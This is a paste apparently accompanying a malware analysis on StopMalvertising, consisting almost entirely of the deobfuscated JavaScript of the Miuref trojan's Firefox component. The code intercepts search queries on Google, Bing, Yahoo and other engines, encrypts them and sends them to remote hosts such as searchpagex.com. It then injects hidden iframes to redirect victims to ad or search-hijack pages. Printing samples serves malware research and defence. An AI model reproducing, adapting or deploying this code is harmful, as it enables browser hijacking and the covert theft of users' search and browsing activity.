StopMalvertising

Trojan:Win32/Miuref.A - MicrosoftDirectInputObject.js

Jan 12th, 2014
  1. # Analysis of Trojan:Win32/Miuref.A
  2. # http://stopmalvertising.com/malware-reports/analysis-of-trojan-win32-miuref-a.html
  3.  
  4. MicrosoftDirectInputObject.js
  5.  
  6. "
  7. {
  8. "e": 0, "c": "(function()
  9. {
  10. function Q(a,c)
  11. {
  12. try
  13. {
  14. var b=y[z+\"xmlextras/xmlhttprequest;
  15. 1\"].createInstance(k.nsIXMLHttpRequest);
  16. b.timeout=6E4;
  17. b.open(\"GET\",a,!0);
  18. b.overrideMimeType(\"text/plain;
  19. charset=x-user-defined\");
  20. b.onreadystatechange=function()
  21. {
  22. try
  23. {
  24. 4==b.readyState&&c(b.responseText,b.status,b)
  25. }
  26. catch(a)
  27. {
  28.  
  29. }
  30.  
  31. }
  32. ;b.send(null)
  33. }
  34. catch(d)
  35. {
  36.  
  37. }
  38.  
  39. }
  40. function D(a,c)
  41. {
  42. var b=[],d,e,f,g;
  43. for(d=0;
  44. 256>d;
  45. d++)b[d]=d;
  46. for(d=e=0;
  47. 256>d;
  48. d++)e=(e+b[d]+c.charCodeAt(d%c.length))%256,f=b[d],b[d]=b[e],b[e]=f;
  49. d=e=0;
  50. var q=\"\";
  51. for(g=0;
  52. g<a.length;
  53. g++)d=(d+\n1)%256,e=(e+b[d])%256,f=b[d],b[d]=b[e],b[e]=f,q+=String.fromCharCode(a.charCodeAt(g)^b[(b[d]+b[e])%256]);
  54. return q
  55. }
  56. function r()
  57. {
  58. this.c=[]
  59. }
  60. function x(a)
  61. {
  62. try
  63. {
  64. return a.QueryInterface(k.nsIInterfaceRequestor).getInterface(k.nsIWebNavigation).QueryInterface(k.nsIDocShellTreeItem).rootTreeItem.QueryInterface(k.nsIInterfaceRequestor).getInterface(k.nsIDOMWindow)
  65. }
  66. catch(c)
  67. {
  68.  
  69. }
  70.  
  71. }
  72. function E()
  73. {
  74. return y[z+\"observer-service;
  75. 1\"].getService(k.nsIObserverService)
  76. }
  77. function F(a)
  78. {
  79. try
  80. {
  81. var c=x(a.target.ownerDocument.defaultView.top).gBrowser,\nb=c.getBrowserForTab(a.target),d=c.selectedBrowser.contentDocument,e=c.getBrowserForDocument(d);
  82. b.b=d.location.href;
  83. b.a=e.a;
  84. e.a=\"\"
  85. }
  86. catch(f)
  87. {
  88.  
  89. }
  90.  
  91. }
  92. function G(a)
  93. {
  94. try
  95. {
  96. for(var c=a.target;
  97. c&&(\"A\"!=c.nodeName||!c.href);
  98. )c=c.parentNode;
  99. if(c)
  100. {
  101. var b=c.ownerDocument,d=this.getBrowserForDocument(b);
  102. d.b=b.defaultView.location.href;
  103. d.a=c.href
  104. }
  105.  
  106. }
  107. catch(e)
  108. {
  109.  
  110. }
  111.  
  112. }
  113. function R(a)
  114. {
  115. try
  116. {
  117. var c=this.gBrowser;
  118. if(c)
  119. {
  120. var b=a.originalTarget.ownerDocument,d=c.getBrowserForDocument(b);
  121. d.b=b.location.href;
  122. d.a=b.location.href
  123. }
  124.  
  125. }
  126. catch(e)
  127. {
  128.  
  129. }
  130.  
  131. }
  132. \nfunction H(a)
  133. {
  134. a.addEventListener(I,J,!1);
  135. var c=a.gBrowser;
  136. c.tabContainer.addEventListener(\"TabOpen\",F,!1);
  137. c.addEventListener(K,G,!0);
  138. a.addEventListener(\"submit\",R,!0)
  139. }
  140. function L(a)
  141. {
  142. try
  143. {
  144. a.removeEventListener(I,J,!1)
  145. }
  146. catch(c)
  147. {
  148.  
  149. }
  150. a=a.gBrowser;
  151. a.tabContainer.removeEventListener(\"TabOpen\",F,!1);
  152. a.removeEventListener(K,G,!0)
  153. }
  154. function J(a)
  155. {
  156. try
  157. {
  158. L(a.originalTarget.defaultView)
  159. }
  160. catch(c)
  161. {
  162.  
  163. }
  164.  
  165. }
  166. function C(a)
  167. {
  168. try
  169. {
  170. var c=a.originalTarget.defaultView;
  171. c.removeEventListener(\"load\",C,!1);
  172. if(c.opener)
  173. {
  174. var b=c.opener.gBrowser,\nd=b.contentDocument,e=d.location.href,f=b.getBrowserForDocument(d),g=c.gBrowser;
  175. if(!g)return;
  176. var q=g.selectedBrowser;
  177. q.b=e;
  178. q.a=f.a;
  179. f.a=\"\"
  180. }
  181. H(c)
  182. }
  183. catch(k)
  184. {
  185.  
  186. }
  187.  
  188. }
  189. function M(a)
  190. {
  191. var c=y[z+\"embedcomp/window-watcher;
  192. 1\"].getService(k.nsIWindowWatcher);
  193. try
  194. {
  195. for(var b=c.getWindowEnumerator();
  196. b.hasMoreElements();
  197. )
  198. {
  199. var d=b.getNext().QueryInterface(k.nsIDOMWindow);
  200. try
  201. {
  202. a(d,\"complete\"==d.document.readyState)
  203. }
  204. catch(e)
  205. {
  206.  
  207. }
  208.  
  209. }
  210.  
  211. }
  212. catch(f)
  213. {
  214.  
  215. }
  216.  
  217. }
  218. function S()
  219. {
  220. M(function(a,c)
  221. {
  222. c&&(a.gBrowser?H(a):a.addEventListener(\"load\",C,!1))
  223. }
  224. )
  225. }
  226. function T()
  227. {
  228. M(function(a,\nc)
  229. {
  230. c&&(a.gBrowser?L(a):a.removeEventListener(\"load\",C,!1))
  231. }
  232. )
  233. }
  234. function A()
  235. {
  236.  
  237. }
  238. var y=Components.classes,k=Components.interfaces,K=\"click\",I=\"unload\",z=\"@mozilla.org/\";
  239. r.prototype=
  240. {
  241. addListener:function(a)
  242. {
  243. this.j(a)||this.c.push(a)
  244. }
  245. ,removeListener:function(a)
  246. {
  247. a=this.g(a);
  248. 0<=a&&this.c.splice(a,1)
  249. }
  250. ,g:function(a)
  251. {
  252. for(var c=this.c,b=0;
  253. b<c.length;
  254. ++b)if(c[b]==a)return b;
  255. return-1
  256. }
  257. ,j:function(a)
  258. {
  259. return-1!=this.g(a)
  260. }
  261. ,o:function()
  262. {
  263. return 0<this.c.length
  264. }
  265. ,d:function()
  266. {
  267. try
  268. {
  269. for(var a=this.c,c=[],b=0;
  270. b<a.length;
  271. ++b)
  272. {
  273. var d=\na[b];
  274. if(\"function\"==typeof d)try
  275. {
  276. var e=d.apply(this,arguments);
  277. \"undefined\"!=typeof e&&c.push(e)
  278. }
  279. catch(f)
  280. {
  281.  
  282. }
  283.  
  284. }
  285. return c
  286. }
  287. catch(g)
  288. {
  289.  
  290. }
  291.  
  292. }
  293.  
  294. }
  295. ;var N=new r,U=new r,O=new r,P=new r;
  296. (function()
  297. {
  298. function a(a)
  299. {
  300. window.l||(window.l=1,stop(),window.setTimeout(function()
  301. {
  302. var m=document.createElement(\"iframe\");
  303. m.src=a;
  304. if(document.body)document.body.appendChild(m);
  305. else
  306. {
  307. var b=document.createElement(\"body\");
  308. b.style.display=\"none\";
  309. var c=document.childNodes[0];
  310. c.appendChild(b);
  311. c.childNodes[0].appendChild(m)
  312. }
  313.  
  314. }
  315. ,0))
  316. }
  317. function c(a,\nm)
  318. {
  319. var b=JSON.stringify(
  320. {
  321. q:a,p:m,t:u
  322. }
  323. );
  324. return p[s]+btoa(D(b,\"http\"))
  325. }
  326. function b(a)
  327. {
  328. if(a=v(a))
  329. {
  330. var m=a[2],b=a[1];
  331. n[b]||(n[b]=
  332. {
  333. h:Math.floor((new Date).getTime()/1E3),f:
  334. {
  335.  
  336. }
  337. ,i:
  338. {
  339.  
  340. }
  341.  
  342. }
  343. ,Q(c(b,m),function(a,m)
  344. {
  345. if(200==m)
  346. {
  347. var B=D(atob(a),u);
  348. n[b].f=JSON.parse(B)
  349. }
  350. else s+=1,s>=p.length&&(s=0)
  351. }
  352. ));
  353. return b
  354. }
  355.  
  356. }
  357. function d(b,m,c)
  358. {
  359. if(m&&(c=v(c))&&!(c[0]>=w.length))
  360. {
  361. m=c[1];
  362. c=w[c[0]][1];
  363. var d=b;
  364. c&&(d=c(b));
  365. if(d&&x.exec(d))try
  366. {
  367. var e=Math.floor((new Date).getTime()/1E3),f;
  368. for(f in n)try
  369. {
  370. n[f].h&&n[f].h+6E5<e&&delete n[f]
  371. }
  372. catch(h)
  373. {
  374.  
  375. }
  376. if(n[m])
  377. {
  378. var k,\ng=n[m];
  379. if(g.f&&!g.i[b]&&(g.i[b]=1,k=g.f.u.shift()))return\"(\"+a.toString()+\")('\"+k+\"')\"
  380. }
  381.  
  382. }
  383. catch(p)
  384. {
  385.  
  386. }
  387.  
  388. }
  389.  
  390. }
  391. function e(a)
  392. {
  393. var b,c=
  394. {
  395.  
  396. }
  397. ,d=a.split(\"&\");
  398. for(b in d)a=d[b].split(\"=\"),c[a[0]]=a[1];
  399. return c
  400. }
  401. function f(a)
  402. {
  403. if(a)
  404. {
  405. for(var b=h.exec(a),c=0;
  406. c<t.length;
  407. ++c)if(-1!=b[1].toLowerCase().indexOf(\".\"+t[c]+\".\"))return;
  408. return a
  409. }
  410.  
  411. }
  412. function g(a)
  413. {
  414. try
  415. {
  416. var b=h.exec(a);
  417. if(-1==b[1].toLowerCase().indexOf(\".ask.\"))return f(a);
  418. if(\"/r\"==b[2]&&b[3])
  419. {
  420. var c=e(b[3]),d=unescape(c.zu?c.zu:c.u);
  421. return g(\"/\"==d.charAt(0)?b[0]+d:d)
  422. }
  423.  
  424. }
  425. catch(k)
  426. {
  427.  
  428. }
  429.  
  430. }
  431. \nfunction q(a)
  432. {
  433. try
  434. {
  435. var b=h.exec(a);
  436. if(-1==b[1].toLowerCase().indexOf(\".google.\"))return f(a);
  437. if(\"/aclk\"==b[2])return a;
  438. if(\"/url\"==b[2]&&b[3])
  439. {
  440. var c=e(b[3]),d=c.url,d=unescape(d?d:c.q);
  441. return q(\"/\"==d.charAt(0)?b[0]+d:d)
  442. }
  443.  
  444. }
  445. catch(g)
  446. {
  447.  
  448. }
  449.  
  450. }
  451. function k(a)
  452. {
  453. try
  454. {
  455. var b;
  456. if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\".aol.com\"))return f(a)
  457. }
  458. catch(c)
  459. {
  460.  
  461. }
  462.  
  463. }
  464. function r(a,b)
  465. {
  466. for(var c=0;
  467. c<a.length;
  468. ++c)if(b(a[c]))return!0;
  469. return!1
  470. }
  471. function v(a)
  472. {
  473. if(a=h.exec(a))for(var b=a[1].toLowerCase(),c=a[2].toLowerCase(),d=0;
  474. d<w.length;
  475. ++d)
  476. {
  477. var f=\nw[d];
  478. if(-1!=b.indexOf(f[2]))
  479. {
  480. if(r(f[3],function(a)
  481. {
  482. return a==c
  483. }
  484. )||r(f[4],function(a)
  485. {
  486. return 0<=c.indexOf(a)
  487. }
  488. ))if(b=
  489. {
  490.  
  491. }
  492. ,f[6]&&a[4]?b=e(a[4]):a[3]&&(b=e(a[3])),f[5]in b)return[d,escape(unescape(b[f[5]].replace(/\\+/g,\" \"))),f[0]];
  493. break
  494. }
  495.  
  496. }
  497.  
  498. }
  499. var n=
  500. {
  501.  
  502. }
  503. ,u=\"\";
  504. N.addListener(function(a)
  505. {
  506. u=a;
  507. O.addListener(b);
  508. P.addListener(d)
  509. }
  510. );
  511. var p=[\"http://searchpagex.com/s?q=\",\"http://searchpagex.org/s?q=\"],s=Math.floor(Math.random()*p.length),h=/^https?:\\/\\/(.*?)(\\/[^\\?#]*)(?:\\?([^#]*))?(?:#(.*))?/i,x=/^https?\\:\\/\\//i,t=\"google facebook youtube yahoo amazon wikipedia ebay gmail twitter craigslist linkedin live go pinterest bing tumblr paypal aol cnn netflix weather apple imgur imdb zedo nytimes microsoft walmart yelp wellsfargo comcast foxnews hulu myspace reddit pandora reference\".split(\" \"),\nw=[[0,q,\".google.\",[\"/webhp\",\"/gen_204\",\"/search\",\"/\"],[],\"q\",!0],[1,function(a)
  512. {
  513. try
  514. {
  515. var b;
  516. if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\".bing.\"))return f(a)
  517. }
  518. catch(c)
  519. {
  520.  
  521. }
  522.  
  523. }
  524. ,\".bing.\",[\"/search\"],[],\"q\",!1],[2,function(a)
  525. {
  526. try
  527. {
  528. var b;
  529. if(b=h.exec(a))
  530. {
  531. var c=b[1].toLowerCase(),d=b[2].toLowerCase();
  532. if(-1!=c.indexOf(\".yahoo.\"))
  533. {
  534. if(0!=d.indexOf(\"/r/\"))return;
  535. a=unescape(a.substr(a.indexOf(\"**http\")+2))
  536. }
  537. return f(a)
  538. }
  539.  
  540. }
  541. catch(e)
  542. {
  543.  
  544. }
  545.  
  546. }
  547. ,\".yahoo.\",[],[\"/search\"],\"p\",!1],[3,k,\".aol.com\",[],[\"/search\"],\"q\",!1],[3,k,\".aol.ca\",\n[],[\"/search\"],\"q\",!1],[4,g,\".ask.com\",[\"/web\"],[],\"q\",!1],[6,function(a)
  548. {
  549. try
  550. {
  551. var b;
  552. if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\"avg.com\"))return f(a)
  553. }
  554. catch(c)
  555. {
  556.  
  557. }
  558.  
  559. }
  560. ,\"search.avg.com\",[\"/search\"],[],\"q\",!0],[9,function(a)
  561. {
  562. try
  563. {
  564. var b;
  565. if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\".mywebsearch.com\"))return f(a)
  566. }
  567. catch(c)
  568. {
  569.  
  570. }
  571.  
  572. }
  573. ,\".mywebsearch.com\",[],[\"ggmain.jhtml\",\"ggweb.jhtml\"],\"searchfor\",!1],[15,function(a)
  574. {
  575. try
  576. {
  577. var b;
  578. if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\".search-results.com\"))return f(a)
  579. }
  580. catch(c)
  581. {
  582.  
  583. }
  584.  
  585. }
  586. ,\n\".search-results.com\",[\"/web\"],[],\"q\",!1],[18,function(a)
  587. {
  588. try
  589. {
  590. var b;
  591. if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\"comcast.net\"))return f(a)
  592. }
  593. catch(c)
  594. {
  595.  
  596. }
  597.  
  598. }
  599. ,\"search.comcast.net\",[\"/\"],[],\"q\",!1],[23,null,\".delta-search.com\",[\"/\"],[],\"q\",!1]]
  600. }
  601. )();
  602. A.prototype=
  603. {
  604. m:function()
  605. {
  606. var a=E();
  607. a.addObserver(this,\"toplevel-window-ready\",!1);
  608. a.addObserver(this,\"http-on-examine-response\",!1);
  609. a.addObserver(this,\"content-document-global-created\",!1);
  610. S()
  611. }
  612. ,n:function()
  613. {
  614. var a=E();
  615. a.removeObserver(this,\"toplevel-window-ready\");
  616. \na.removeObserver(this,\"http-on-examine-response\");
  617. a.removeObserver(this,\"content-document-global-created\");
  618. T()
  619. }
  620.  
  621. }
  622. ;A.prototype.observe=function(a,c,b)
  623. {
  624. switch(c)
  625. {
  626. case \"toplevel-window-ready\":a.addEventListener(\"load\",C,!1);
  627. break;
  628. case \"http-on-examine-response\":try
  629. {
  630. if(a)
  631. {
  632. var d=a.QueryInterface(k.nsIHttpChannel),e=x(d.notificationCallbacks);
  633. !e&&d.loadGroup&&(e=x(d.loadGroup.notificationCallbacks));
  634. if(e)
  635. {
  636. var f=e.content.document,g=e.gBrowser;
  637. if(g)
  638. {
  639. var q=g.getBrowserForDocument(f);
  640. if(q.e)
  641. {
  642. var r=d.responseStatus;
  643. \nif(\"4\"==r[0]||\"5\"==r[0])q.e=0,f.location=q.k
  644. }
  645. else O.d(d.name)
  646. }
  647.  
  648. }
  649.  
  650. }
  651.  
  652. }
  653. catch(t)
  654. {
  655.  
  656. }
  657. break;
  658. case \"content-document-global-created\":if(b&&\"null\"!=b)try
  659. {
  660. var v=a.top;
  661. if(a==v)
  662. {
  663. var n=v.document,u=x(v).gBrowser;
  664. u||(u=x(v).wrappedJSObject.gBrowser);
  665. if(u)
  666. {
  667. var p=u.getBrowserForDocument(n);
  668. if(p)
  669. {
  670. var s=a.document.referrer,h=v.location.href;
  671. \"about:blank\"==h&&(h=\"\");
  672. var y=p.b,z=p.a;
  673. h&&(p.a=\"\");
  674. p.e=0;
  675. s||z||(p.b=\"\");
  676. s?p.a=\"\":s=z;
  677. if(h&&s&&y)
  678. {
  679. p.b=\"\";
  680. var w=P.d(h,s,y);
  681. if(w&&w.length)
  682. {
  683. p.e=1;
  684. p.k=h;
  685. var n=a.document,B=n.documentElement,\nm=B?B:n.createElement(\"html\");
  686. m.innerHTML='<html><head><title>Connecting...</title></head><body style=\"display:none\"></body></html>';
  687. B||n.appendChild(m);
  688. n.getElementsByTagName(\"head\");
  689. var A=n.createElement(\"script\");
  690. A.innerHTML=\"(function()
  691. {
  692. try
  693. {
  694. \"+w.join(\"
  695. }
  696. catch(e)
  697. {
  698.  
  699. }
  700. ;try
  701. {
  702. \")+\"
  703. }
  704. catch(e)
  705. {
  706.  
  707. }
  708.  
  709. }
  710. ())\";
  711. m.appendChild(A)
  712. }
  713.  
  714. }
  715.  
  716. }
  717.  
  718. }
  719.  
  720. }
  721.  
  722. }
  723. catch(D)
  724. {
  725.  
  726. }
  727.  
  728. }
  729.  
  730. }
  731. ;var t;
  732. return[function(a)
  733. {
  734. N.d(a);
  735. t=new A;
  736. t.m()
  737. }
  738. ,function()
  739. {
  740. t&&(t.n(),t=null);
  741. U.d()
  742. }
  743. ]
  744. }
  745. )();
  746. \n", "u": ["http://search-page.net", "http://search-direct.net", "http://searchtop.org"], "v": 4
  747. }
  748. "